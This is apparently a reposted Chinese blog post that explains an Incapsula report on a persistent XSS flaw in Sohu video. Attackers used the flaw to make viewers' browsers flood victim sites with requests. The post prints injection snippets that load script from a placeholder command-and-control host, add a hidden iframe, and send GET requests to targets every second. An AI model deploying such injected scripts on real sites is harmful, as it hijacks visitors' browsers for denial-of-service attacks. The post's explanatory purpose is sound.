• XSS攻击:SOHU视频XSS漏洞导致其用户成为DDOS肉鸡


    XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入当中Web里面的html代码会被运行,从而达到恶意攻击用户的特殊目的。

    from:http://www.incapsula.com/blog/world-largest-site-xss-ddos-zombies.html 

    incapsula发现其一个客户遭受了应用层的DDos攻击。 

    大概有22000的互联网用户对其站点发起了2000万的GET请求。 
    该攻击是利用的一个持久性XSS,通过找到一个訪问量非常大站点的xss,在其站点上插入一段js代码,当其用户訪问站点之后,就能够利用该站点的用户对其受害者发起攻击。 

    几种演示样例代码: 
    // JavaScript Injection in <img> tag enabled by Persistent XSS 
    <img src="/imagename.jpg" onload="$.getScript('http://c&cdomain.com/index.html')" /> 

    // Malicious JavaScript opens hidden <iframe> 
    function ddos(url) { 
    $("body").append("<iframe id='ifr11323' style='display:none;' src='http://c&cdomain.com/index.html'></iframe>"); } 

    // Ajax DDoS tool in executes GET request every second 
    <html><body> 
    <h1>Iframe</h1> 
    <script> 
    ddos('http://www.target1.com/1.jpg', 'http://www.target2.com/1.jpg'); 
    function ddos(url,url2){ 
      window.setInterval(function (){ 
        $.getScript(url); 
        $.getScript(url2); 
          },1000) 

    </script> 
    </body></html>

    这样的攻击方式在找到訪问量巨大的视频站点的xss之后,很好用,由于一般的视频时间不短,这样訪问者在訪问视频站点观看视频的时间段内,就不知不觉的成为攻击者的工具对其受害者站点不断的发送请求。 
    此次被利用的是sohu视频,全球站点流量排名27,可在视频区域插入xss代码,控制观看该视频的用户对受害者不断的发送请求。 

    注:攻击的效果就是每秒都请求一次url和url2指定的连接,假设一段视频30分钟,那么每一个用户都能在看视频这段时间内向两个目标分别发出 1800 次无意义的攻击请求(如cc),假设是成千上万的人看个热门视频的话。。。 


  • 相关阅读:
    人生苦短之Python的urllib urllib2 requests
    近期测试BUG总结
    人生苦短之Python列表拷贝
    测试发展前景,测试人员的发展方向,测试趋势
    人生苦短之Python函数的健壮性
    Python视频教程
    人生苦短之Python文件的IO操作
    人生苦短之Python枚举类型enum
    人生苦短之Python类的一二三
    人生苦短之Python装饰器
  • 原文地址:https://www.cnblogs.com/mfrbuaa/p/3773709.html
Copyright © 2020-2023  润新知